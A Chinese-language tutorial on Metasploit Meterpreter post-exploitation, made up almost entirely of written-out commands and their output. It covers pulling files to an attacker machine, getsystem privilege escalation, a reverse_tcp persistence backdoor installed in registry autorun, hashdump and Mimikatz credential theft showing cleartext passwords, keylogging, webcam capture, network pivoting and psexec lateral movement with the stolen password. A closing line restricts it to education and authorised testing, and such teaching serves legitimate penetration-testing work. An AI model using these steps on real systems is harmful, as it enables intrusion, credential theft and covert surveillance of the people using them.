Metasploit Meterpreter 後滲透技術

什麼是 Meterpreter？

Meterpreter（Meta-Interpreter）是 Metasploit Framework 中最強大的 payload 之一。它是一個進階的、動態可擴展的 payload，透過記憶體 DLL 注入的方式運作，並提供豐富的後滲透功能。

Meterpreter 的主要特性

記憶體駐留：完全在記憶體中運行，不會在硬碟上留下檔案
加密通訊：使用 TLS 加密的通道與攻擊者進行通訊
動態載入：可以在運行時動態載入擴展模組
跨平台支援：支援 Windows、Linux、macOS 等多種作業系統

基本 Meterpreter 指令

取得 Meterpreter session 後，可以使用以下基本指令進行操作。

查看幫助資訊

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
meterpreter > help

Core Commands
=============
    Command       Description
    -------       -----------
    ?             Help menu
    background    Backgrounds the current session
    exit          Terminate the Meterpreter session
    help          Help menu
    migrate       Migrate the server to another process
    ...

取得系統資訊

1
2
3
4
5
6
7
8
meterpreter > sysinfo
Computer        : TARGET-PC
OS              : Windows 10 (10.0 Build 19041)
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows

取得當前使用者身分

1
2
meterpreter > getuid
Server username: TARGET-PC\Administrator

檔案系統操作

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# 顯示當前目錄
meterpreter > pwd
C:\Users\Administrator\Desktop

# 列出檔案
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
========================================
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2023-12-01 10:30:15 +0800  desktop.ini
100666/rw-rw-rw-  1024  fil   2023-12-15 14:22:33 +0800  important.txt

# 切換目錄
meterpreter > cd C:\\Windows\\System32

# 下載檔案到攻擊機
meterpreter > download C:\\Users\\Administrator\\Desktop\\important.txt /tmp/
[*] Downloading: C:\Users\Administrator\Desktop\important.txt -> /tmp/important.txt
[*] Downloaded 1.00 KiB of 1.00 KiB (100.0%): important.txt

# 上傳檔案到目標機
meterpreter > upload /tmp/payload.exe C:\\Windows\\Temp\\
[*] uploading  : /tmp/payload.exe -> C:\Windows\Temp\payload.exe
[*] uploaded   : /tmp/payload.exe -> C:\Windows\Temp\payload.exe

系統資訊收集

收集目標系統的詳細資訊對於後續滲透至關重要。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
# 取得處理程序列表
meterpreter > ps
PID   PPID  Name               Arch  Session  User                  Path
---   ----  ----               ----  -------  ----                  ----
0     0     [System Process]
4     0     System             x64   0
88    4     Registry           x64   0
...

# 取得網路設定
meterpreter > ipconfig
Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0

Interface 11
============
Name         : Intel(R) Ethernet Connection
Hardware MAC : 00:0c:29:aa:bb:cc
MTU          : 1500
IPv4 Address : 192.168.1.100
IPv4 Netmask : 255.255.255.0

# 檢視路由表
meterpreter > route
IPv4 network routes
====================
    Subnet           Netmask          Gateway         Metric  Interface
    ------           -------          -------         ------  ---------
    0.0.0.0          0.0.0.0          192.168.1.1     25      11
    192.168.1.0      255.255.255.0    192.168.1.100   281     11

權限提升技術

使用 getsystem 提升權限

1
2
3
4
5
6
7
8
meterpreter > getuid
Server username: TARGET-PC\user

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

使用 Local Exploit Suggester

當 getsystem 失敗時，可以使用本地漏洞建議模組。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
meterpreter > background
[*] Backgrounding session 1...

msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.1.100 - Collecting local exploits for x64/windows...
[*] 192.168.1.100 - 37 exploit checks are being tried...
[+] 192.168.1.100 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 192.168.1.100 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target appears to be vulnerable.

持久化後門設定

使用 Persistence 模組

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
meterpreter > run persistence -h

Meterpreter Script for creating a persistent backdoor

OPTIONS:
    -A        Automatically start a matching exploit/multi/handler
    -L <opt>  Location in target host to write payload
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp
    -S        Automatically start the agent on boot as a service
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on which the system running Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back

# 建立開機自動啟動的後門
meterpreter > run persistence -X -i 10 -p 4444 -r 192.168.1.50
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/TARGET-PC_20231220.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444
[*] Persistent agent script is 99643 bytes long
[+] Persistent Script written to C:\Windows\TEMP\vBsMKQ.vbs
[*] Executing script C:\Windows\TEMP\vBsMKQ.vbs
[+] Agent executed with PID 2756
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YqGNWCfkhv
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YqGNWCfkhv

憑證收集

使用 hashdump 取得密碼雜湊

1
2
3
4
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
user:1001:aad3b435b51404eeaad3b435b51404ee:e52cac67419a9a224a3b108f3fa6cb6d:::

使用 Mimikatz 擴展（Kiwi）

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20210810 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi`
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX
  '#####'         > https://pingcastle.com / https://mysmartlogon.com ***/

Success.

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials

msv credentials
===============
Username       Domain      NTLM                              SHA1
--------       ------      ----                              ----
Administrator  TARGET-PC   31d6cfe0d16ae931b73c59d7e0c089c0  da39a3ee5e6b4b0d3255bfef95601890afd80709

wdigest credentials
===================
Username       Domain      Password
--------       ------      --------
Administrator  TARGET-PC   P@ssw0rd123!

網路探測與 Pivot

設定路由進行內網滲透

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# 檢視目標網路介面
meterpreter > ipconfig
Interface 11
============
IPv4 Address : 192.168.1.100
IPv4 Netmask : 255.255.255.0

Interface 15
============
IPv4 Address : 10.10.10.5
IPv4 Netmask : 255.255.255.0

# 新增路由到內網
meterpreter > run autoroute -s 10.10.10.0/24
[*] Adding a route to 10.10.10.0/255.255.255.0...
[+] Added route to 10.10.10.0/255.255.255.0 via 192.168.1.100
[*] Use the -p option to list all active routes

# 查看已設定的路由
meterpreter > run autoroute -p
Active Routing Table
====================
   Subnet             Netmask            Gateway
   ------             -------            -------
   10.10.10.0         255.255.255.0      Session 1

使用 Port Forwarding

1
2
3
4
5
6
# 設定本地端口轉發
meterpreter > portfwd add -l 3389 -p 3389 -r 10.10.10.20
[*] Local TCP relay created: :3389 <-> 10.10.10.20:3389

# 現在可以從攻擊機直接連接內網主機的 RDP
# rdesktop 127.0.0.1:3389

常用的後滲透模組

資訊收集模組

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
# 列舉已安裝的應用程式
msf6 > use post/windows/gather/enum_applications
msf6 post(windows/gather/enum_applications) > set SESSION 1
msf6 post(windows/gather/enum_applications) > run

# 列舉瀏覽器憑證
msf6 > use post/multi/gather/firefox_creds
msf6 > use post/windows/gather/enum_chrome

# 螢幕截圖
meterpreter > screenshot
Screenshot saved to: /root/oBFDNQUf.jpeg

# 鍵盤側錄
meterpreter > keyscan_start
Starting the keystroke sniffer ...
meterpreter > keyscan_dump
Dumping captured keystrokes...
user@email.com<Tab>MySecretPassword<CR>
meterpreter > keyscan_stop
Stopping the keystroke sniffer...

# 啟用 Webcam
meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/webcam.jpeg

橫向移動

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
# 使用 PsExec 進行橫向移動
msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set RHOSTS 10.10.10.20
msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
msf6 exploit(windows/smb/psexec) > set SMBPass P@ssw0rd123!
msf6 exploit(windows/smb/psexec) > set PAYLOAD windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > exploit

[*] Started bind TCP handler against 10.10.10.20:4444
[*] Connecting to the server...
[*] Meterpreter session 2 opened

安全注意事項

本文僅供教育和授權滲透測試使用
未經授權對系統進行滲透測試是違法的
進行滲透測試前務必取得書面授權
測試完成後應清除所有留下的痕跡和後門